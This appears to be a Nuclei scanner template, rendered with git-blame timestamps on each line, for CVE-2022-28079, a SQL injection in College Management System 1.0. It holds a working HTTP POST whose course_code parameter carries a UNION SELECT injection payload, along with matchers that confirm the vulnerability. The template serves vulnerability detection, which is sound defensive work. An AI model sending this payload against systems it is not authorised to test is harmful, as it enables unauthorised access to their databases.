2022-06-23 08:15:30 +00:00
|
|
|
id: CVE-2022-28079
|
|
|
|
|
|
|
|
info:
|
2022-07-26 13:45:11 +00:00
|
|
|
name: College Management System 1.0 - SQL Injection
|
2022-06-23 08:15:30 +00:00
|
|
|
author: ritikchaddha
|
|
|
|
severity: high
|
|
|
|
description: |
|
2022-07-26 13:45:11 +00:00
|
|
|
College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.
|
2023-09-06 11:59:08 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade to the latest version to mitigate this vulnerability.
|
2022-06-23 08:15:30 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated
|
|
|
|
- https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-28079
|
2022-06-24 19:01:51 +00:00
|
|
|
- https://code-projects.org/college-management-system-in-php-with-source-code/
|
2023-07-11 19:49:27 +00:00
|
|
|
- https://www.nu11secur1ty.com/2022/05/cve-2022-28079.html
|
2022-06-24 19:01:51 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 8.8
|
|
|
|
cve-id: CVE-2022-28079
|
|
|
|
cwe-id: CWE-89
|
2023-11-27 09:19:41 +00:00
|
|
|
epss-score: 0.82978
|
|
|
|
epss-percentile: 0.9811
|
2023-09-06 11:59:08 +00:00
|
|
|
cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:*
|
2022-06-23 18:44:57 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 11:59:08 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: college_management_system_project
|
|
|
|
product: college_management_system
|
2023-12-05 09:50:33 +00:00
|
|
|
tags: cve,cve2022,sqli,cms,collegemanagement,college_management_system_project
|
2022-06-30 03:30:04 +00:00
|
|
|
variables:
|
|
|
|
num: "999999999"
|
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-06-23 08:15:30 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /admin/asign-single-student-subjects.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
2022-06-30 03:30:04 +00:00
|
|
|
submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#
|
2022-06-23 08:15:30 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2022-06-30 03:30:04 +00:00
|
|
|
- '{{md5({{num}})}}'
|
2022-06-23 08:15:30 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 302
|
2023-12-06 05:59:56 +00:00
|
|
|
# digest: 490a00463044022045cce03ba5ea7a8922d355859e5627d8292f0ade411e69115ff01fb881382010022038a9100b6d33d80e3709d09727f6f0b69acbc61516e3906ee1501e372bd7379d:922c64590222798bb761d5b6d8e72950
|